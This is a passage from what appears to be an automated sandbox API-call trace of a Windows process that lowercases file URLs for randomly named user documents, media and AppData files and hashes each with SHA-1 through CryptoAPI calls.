_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/807h.flv") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/807h.flv" [0067.332] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.332] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/807h.flv") returned 0x36 [0067.332] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x6e, dwFlags=0x0) returned 1 [0067.332] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.332] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.332] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/807h.flv") returned 0x36 [0067.332] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.333] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/807h.flv/") returned 0x37 [0067.333] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x70, dwFlags=0x0) returned 1 [0067.333] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.333] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.333] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/tJjBkYuM9GIXos9WvZ.wav") returned 0x44 [0067.333] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/tJjBkYuM9GIXos9WvZ.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/tjjbkyum9gixos9wvz.wav") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/tjjbkyum9gixos9wvz.wav" [0067.333] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.333] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/tjjbkyum9gixos9wvz.wav") returned 0x44 [0067.333] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0067.333] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.333] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.333] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/tjjbkyum9gixos9wvz.wav") returned 0x44 [0067.333] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.333] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/tjjbkyum9gixos9wvz.wav/") returned 0x45 [0067.333] CryptHashData (hHash=0x65ed88, pbData=0x198270, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0067.333] CryptGetHashParam (in: hHash=0x65ed88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.333] CryptDestroyHash (hHash=0x65ed88) returned 1 [0067.333] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/bxoH3gqk-.xlsx") returned 0x36 [0067.333] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/bxoH3gqk-.xlsx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/bxoh3gqk-.xlsx") returned="file:///c:/users/ciihmnxmn6ps/documents/bxoh3gqk-.xlsx" [0067.333] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.333] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/bxoh3gqk-.xlsx") returned 0x36 [0067.333] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x6e, dwFlags=0x0) returned 1 [0067.333] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.333] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.333] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/bxoh3gqk-.xlsx") returned 0x36 [0067.333] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.333] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/bxoh3gqk-.xlsx/") returned 0x37 [0067.333] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x70, dwFlags=0x0) returned 1 [0067.333] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.333] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.333] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/TC8xDvRyH%204v6.mp3") returned 0x66 [0067.333] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/TC8xDvRyH%204v6.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/tc8xdvryh%204v6.mp3") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/tc8xdvryh%204v6.mp3" [0067.333] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.333] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/tc8xdvryh%204v6.mp3") returned 0x66 [0067.333] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0xce, dwFlags=0x0) returned 1 [0067.333] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.333] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.333] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/tc8xdvryh%204v6.mp3") returned 0x66 [0067.333] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.333] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/tc8xdvryh%204v6.mp3/") returned 0x67 [0067.333] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0xd0, dwFlags=0x0) returned 1 [0067.333] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.333] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.333] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/t_IskEYIDLhd7Kz2pzkI.avi") returned 0x4b [0067.333] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/t_IskEYIDLhd7Kz2pzkI.avi" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t_iskeyidlhd7kz2pzki.avi") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t_iskeyidlhd7kz2pzki.avi" [0067.333] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.333] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t_iskeyidlhd7kz2pzki.avi") returned 0x4b [0067.333] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x98, dwFlags=0x0) returned 1 [0067.334] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.334] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.334] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t_iskeyidlhd7kz2pzki.avi") returned 0x4b [0067.334] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.334] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t_iskeyidlhd7kz2pzki.avi/") returned 0x4c [0067.334] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x9a, dwFlags=0x0) returned 1 [0067.334] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.334] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.334] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/TrlzRy95_.ods") returned 0x35 [0067.334] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/TrlzRy95_.ods" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/trlzry95_.ods") returned="file:///c:/users/ciihmnxmn6ps/documents/trlzry95_.ods" [0067.334] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.334] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/trlzry95_.ods") returned 0x35 [0067.334] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x6c, dwFlags=0x0) returned 1 [0067.334] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.334] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.334] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/trlzry95_.ods") returned 0x35 [0067.334] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.334] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/trlzry95_.ods/") returned 0x36 [0067.334] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x6e, dwFlags=0x0) returned 1 [0067.334] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.334] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.334] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/FgNl5F.png") returned 0x4b [0067.334] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/FgNl5F.png" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/fgnl5f.png") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/fgnl5f.png" [0067.334] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.334] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/fgnl5f.png") returned 0x4b [0067.334] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x98, dwFlags=0x0) returned 1 [0067.334] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.334] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.334] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/fgnl5f.png") returned 0x4b [0067.334] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.334] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/fgnl5f.png/") returned 0x4c [0067.334] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x9a, dwFlags=0x0) returned 1 [0067.334] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.334] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.334] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/Khh6KHLKeCgwE-.jpg") returned 0x53 [0067.334] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/Khh6KHLKeCgwE-.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/khh6khlkecgwe-.jpg") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/khh6khlkecgwe-.jpg" [0067.334] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.334] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/khh6khlkecgwe-.jpg") returned 0x53 [0067.334] CryptHashData (hHash=0x65edc8, pbData=0x198270, dwDataLen=0xa8, dwFlags=0x0) returned 1 [0067.334] CryptGetHashParam (in: hHash=0x65edc8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.334] CryptDestroyHash (hHash=0x65edc8) returned 1 [0067.334] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/khh6khlkecgwe-.jpg") returned 0x53 [0067.334] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.334] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/khh6khlkecgwe-.jpg/") returned 0x54 [0067.334] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0xaa, dwFlags=0x0) returned 1 [0067.334] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.334] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.334] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/2Jz2Z0.png") returned 0x3f [0067.335] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/2Jz2Z0.png" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/2jz2z0.png") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/2jz2z0.png" [0067.335] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.335] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/2jz2z0.png") returned 0x3f [0067.335] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x80, dwFlags=0x0) returned 1 [0067.335] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.335] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.335] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/2jz2z0.png") returned 0x3f [0067.335] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.335] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/2jz2z0.png/") returned 0x40 [0067.335] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x82, dwFlags=0x0) returned 1 [0067.335] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.335] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.335] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/t4tPcVg9UPnJ6f/w3NO.mkv") returned 0x4a [0067.335] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/t4tPcVg9UPnJ6f/w3NO.mkv" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/w3no.mkv") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/w3no.mkv" [0067.335] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.335] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/w3no.mkv") returned 0x4a [0067.335] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x96, dwFlags=0x0) returned 1 [0067.335] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.335] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.335] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/w3no.mkv") returned 0x4a [0067.335] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.335] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/w3no.mkv/") returned 0x4b [0067.335] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x98, dwFlags=0x0) returned 1 [0067.335] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.335] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.335] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/kVswE3J.pptx") returned 0x34 [0067.335] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/kVswE3J.pptx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/kvswe3j.pptx") returned="file:///c:/users/ciihmnxmn6ps/documents/kvswe3j.pptx" [0067.335] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.335] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/kvswe3j.pptx") returned 0x34 [0067.335] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x6a, dwFlags=0x0) returned 1 [0067.335] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.335] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.335] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/kvswe3j.pptx") returned 0x34 [0067.335] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.335] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/kvswe3j.pptx/") returned 0x35 [0067.335] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x6c, dwFlags=0x0) returned 1 [0067.335] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.335] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.335] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/lwiG-DneO8K.wav") returned 0x3d [0067.335] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/lwiG-DneO8K.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/lwig-dneo8k.wav") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/lwig-dneo8k.wav" [0067.335] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.335] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/lwig-dneo8k.wav") returned 0x3d [0067.335] CryptHashData (hHash=0x65ee08, pbData=0x198270, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0067.335] CryptGetHashParam (in: hHash=0x65ee08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.335] CryptDestroyHash (hHash=0x65ee08) returned 1 [0067.335] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/lwig-dneo8k.wav") returned 0x3d [0067.335] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.335] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/lwig-dneo8k.wav/") returned 0x3e [0067.335] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0067.336] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.336] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.336] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/kmqpMZd3Ym7c_H2OF43T.gif") returned 0x46 [0067.336] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/kmqpMZd3Ym7c_H2OF43T.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/kmqpmzd3ym7c_h2of43t.gif") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/kmqpmzd3ym7c_h2of43t.gif" [0067.336] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.336] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/kmqpmzd3ym7c_h2of43t.gif") returned 0x46 [0067.336] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0067.336] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.336] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.336] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/kmqpmzd3ym7c_h2of43t.gif") returned 0x46 [0067.336] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.336] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/kmqpmzd3ym7c_h2of43t.gif/") returned 0x47 [0067.336] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x90, dwFlags=0x0) returned 1 [0067.336] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.336] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.336] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/Y_bLbkE.pptx") returned 0x34 [0067.336] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/Y_bLbkE.pptx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/y_blbke.pptx") returned="file:///c:/users/ciihmnxmn6ps/documents/y_blbke.pptx" [0067.336] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.336] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/y_blbke.pptx") returned 0x34 [0067.336] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x6a, dwFlags=0x0) returned 1 [0067.336] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.336] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.336] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/y_blbke.pptx") returned 0x34 [0067.336] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.336] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/y_blbke.pptx/") returned 0x35 [0067.336] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x6c, dwFlags=0x0) returned 1 [0067.336] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.336] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.336] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/YXuGM.odt") returned 0x3b [0067.336] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/YXuGM.odt" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/yxugm.odt") returned="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/yxugm.odt" [0067.336] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.336] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/yxugm.odt") returned 0x3b [0067.336] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x78, dwFlags=0x0) returned 1 [0067.336] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.336] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.336] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/yxugm.odt") returned 0x3b [0067.336] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.336] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/yxugm.odt/") returned 0x3c [0067.336] CryptHashData (hHash=0x65f108, pbData=0x198270, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0067.336] CryptGetHashParam (in: hHash=0x65f108, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.336] CryptDestroyHash (hHash=0x65f108) returned 1 [0067.336] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/M_VJrQ.wav") returned 0x45 [0067.336] _wcslwr (in: 